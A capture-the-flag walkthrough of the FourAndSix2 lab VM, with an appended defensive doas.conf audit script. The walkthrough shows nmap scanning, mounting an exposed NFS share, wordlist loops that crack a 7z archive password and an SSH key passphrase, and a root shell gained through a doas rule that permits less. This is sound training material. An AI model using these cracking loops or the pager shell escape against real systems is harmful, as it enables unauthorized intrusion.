
Target VM pentest

The fourandsix2 VM

As soon as it boots, the VM shows its IP address: 192.168.41.132

Then scan it with nmap:
nmap -A -n -v -Pn -A 192.168.41.132
-A Enable OS detection, version detection, script scanning, and traceroute
-n -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
-Pn Treat all hosts as online — skip host discovery

Scan report:

Nmap scan report for 192.168.41.132
Host is up (0.00059s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 ef:3b:2e:cf:40:19:9e:bb:23:1e:aa:24:a1:09:4e:d1 (RSA)
| 256 c8:5c:8b:0b:e1:64:0c:75:c3:63:d7:b3:80:c9:2f:d2 (ECDSA)
|_ 256 61:bc:45:9a:ba:a5:47:20:60:13:25:19:b0:47:cb:ad (ED25519)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 780/udp mountd
|_ 100005 1,3 917/tcp mountd
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:81:23:53 (VMware)
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.1
Uptime guess: 0.000 days (since Sat Jul 20 02:04:15 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.41.132

It is rare for nmap to turn up this much information in one go.
The target has port 2049 open, which is the NFS service, so the next step is to enumerate the directories that can be mounted.

  • -sV : Probe open ports to determine service/version info

nmap -sV --script=nfs-showmount 192.168.41.132
Enumerate the mountable directories.

Result:

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
| nfs-showmount:
|_ /home/user/storage
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 780/udp mountd
|_ 100005 1,3 917/tcp mountd
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:81:23:53 (VMware)

Good, so the directory can be mounted.

root@kali:~# nfspysh -o server=192.168.41.132:/home/user/storage /tmp/test/
nfspy@192.168.41.132:/home/user/storage:/>

nfspysh usage:

root@kali:~# nfspysh -h
Usage: nfspysh [options]

Options:
-h, --help show this help message and exit
-l List mount options available
-o OPTIONS Mount options as in nfspy
-c COMMAND Semicolon-separated commands to run (batch mode)

The directory contains an archive:
get backup.7z
Then try to extract it with 7z, but it is password-protected.

So use john to crack it.

However, brute-forcing is rather slow.

The password turns out to be chocolate.

PS: Kali actually ships with many wordlists, for example /usr/share/john/password.lst

After extraction we get a public key and a private key.

The following loop brute-forces the key's passphrase, which turns out to be 12345678:

root@kali:/tmp# cat /usr/share/john/password.lst | while read -r pass; do if ssh-keygen -c -C "user@192.168.41.132" -P "$pass" -f id_rsa &>/dev/null; then echo "$pass"; break; fi; done
12345678

Then we can log in:
ssh -i id_rsa user@192.168.41.132

Earlier attempts kept failing because I had forgotten to set the permissions,
that is:
chmod 600 id_rsa

After that the login works:

root@kali:/tmp# ssh -i id_rsa user@192.168.41.132
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

fourandsix2$

For comparison, this is what the wrong way looks like:

root@kali:/tmp# ssh -i id_rsa user@192.168.41.132
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.

After logging in,

the /root directory cannot be read directly:

fourandsix2$ ls /root/
ls: /root/: Permission denied

I don't really understand the next step.

Run
doas /usr/bin/less /var/log/authlog
then press v to open the file in the editor,
and from there type :!/bin/sh


That gives us root:

fourandsix2# whoami
root

It worked:

fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!

Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done

cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done


Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42

Supplementary notes on the privilege escalation:
/etc/doas.conf contains the following entry,
so the doas command can be used to view the authlog file,
and by editing it from there we drop into a shell.

(screenshot: doas.conf)
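The root cause here is a doas rule that permits a pager, and less (like vi and friends) can start a child process from inside its own interface. As an added defensive check that is not part of the original write-up, the Python script below parses a doas.conf and flags permit rules that either allow any command or allow a command with a known shell escape; the sample configuration is constructed for this example and is not the box's real /etc/doas.conf.

```python
import os
import re

# Pagers and editors can launch a child process from their own UI, so a doas
# rule that permits one of them as root is as good as an unrestricted permit.
SHELL_ESCAPERS = {"less", "more", "vi", "vim", "view", "ed", "man", "nano"}
OPTIONS = {"nopass", "persist", "keepenv"}

SAMPLE_CONF = """\
# constructed sample for this example; not the real /etc/doas.conf from the box
permit persist :wheel
permit nopass user as root cmd /usr/bin/less args /var/log/authlog
permit nopass backup as root cmd /bin/tar args -czf /var/backups/home.tgz /home
deny user cmd /usr/bin/vi
"""

def parse_rule(line):
    """Parse one doas.conf line into a dict; return None for blank or comment lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    line = re.sub(r"setenv\s*\{[^}]*\}", "", line)  # setenv { ... } may contain spaces
    tokens = line.split()
    rule = {"action": tokens.pop(0), "options": [], "target": None, "cmd": None, "args": None}
    while tokens and tokens[0] in OPTIONS:
        rule["options"].append(tokens.pop(0))
    rule["identity"] = tokens.pop(0)
    if tokens[:1] == ["as"]:
        rule["target"], tokens = tokens[1], tokens[2:]
    if tokens[:1] == ["cmd"]:
        rule["cmd"], tokens = tokens[1], tokens[2:]
    if tokens[:1] == ["args"]:
        rule["args"] = tokens[1:]
    return rule

def audit(conf_text):
    """Return (line_no, identity, reason) for every permit rule that can yield a shell."""
    findings = []
    for n, raw in enumerate(conf_text.splitlines(), 1):
        rule = parse_rule(raw)
        if rule is None or rule["action"] != "permit":
            continue
        if rule["cmd"] is None:
            findings.append((n, rule["identity"], "any command"))
        elif os.path.basename(rule["cmd"]) in SHELL_ESCAPERS:
            findings.append((n, rule["identity"], f"{rule['cmd']} has a shell escape"))
    return findings

if __name__ == "__main__":
    for line_no, who, why in audit(SAMPLE_CONF):
        print(f"doas.conf:{line_no}: {who}: {why}")
```

Remember that doas evaluates rules with last-match-wins semantics, so a flagged permit may still be overridden by a later deny for the same identity; the script lists candidates for review rather than the effective policy.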

References

FourAndSix2.01 target VM pentest